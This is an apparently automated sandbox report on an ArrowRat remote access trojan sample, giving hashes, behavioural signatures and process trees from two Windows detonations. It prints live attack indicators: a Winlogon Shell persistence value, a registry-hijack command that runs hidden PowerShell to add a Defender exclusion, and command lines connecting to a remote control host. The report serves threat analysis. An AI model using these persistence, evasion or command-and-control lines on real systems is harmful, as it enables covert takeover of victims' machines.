Malware Analysis Report

2024-10-10 10:37

Sample ID 230731-c6dnpadc4s
Target d7dea9816b882cb53d615a3afdf0c955.bin
SHA256 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
Tags
client arrowrat persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

Threat Level: Known bad

The file d7dea9816b882cb53d615a3afdf0c955.bin was found to be: Known bad.

Malicious Activity Summary

client arrowrat persistence rat

ArrowRat

Modifies WinLogon for persistence

Arrowrat family

Modifies Installed Components in the registry

Checks computer location settings

Enumerates connected drives

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-31 02:40

Signatures

Arrowrat family

arrowrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-31 02:40

Reported

2023-07-31 02:43

Platform

win7-20230712-en

Max time kernel

129s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe"

Signatures

ArrowRat

rat arrowrat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe" C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe'" C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open\command C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1212 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\explorer.exe
PID 1212 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\explorer.exe
PID 1212 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\explorer.exe
PID 2612 wrote to memory of 1492 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2612 wrote to memory of 1492 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2612 wrote to memory of 1492 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 1212 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\System32\ComputerDefaults.exe
PID 1212 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\System32\ComputerDefaults.exe
PID 1212 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\System32\ComputerDefaults.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe

"C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\System32\ComputerDefaults.exe

"C:\Windows\System32\ComputerDefaults.exe"

Network

N/A

Files

memory/1212-54-0x0000000000B10000-0x0000000000B3E000-memory.dmp

memory/1212-55-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmp

memory/3024-57-0x0000000001D00000-0x0000000001D01000-memory.dmp

memory/1212-58-0x0000000000420000-0x00000000004A0000-memory.dmp

memory/2612-59-0x0000000003F60000-0x0000000003F61000-memory.dmp

memory/1212-60-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmp

memory/3024-61-0x0000000001D00000-0x0000000001D01000-memory.dmp

memory/1212-62-0x0000000000420000-0x00000000004A0000-memory.dmp

memory/2612-63-0x0000000003F60000-0x0000000003F61000-memory.dmp

memory/2612-67-0x00000000027B0000-0x00000000027C0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-31 02:40

Reported

2023-07-31 02:43

Platform

win10v2004-20230703-en

Max time kernel

141s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe"

Signatures

ArrowRat

rat arrowrat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe" C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3872 set thread context of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
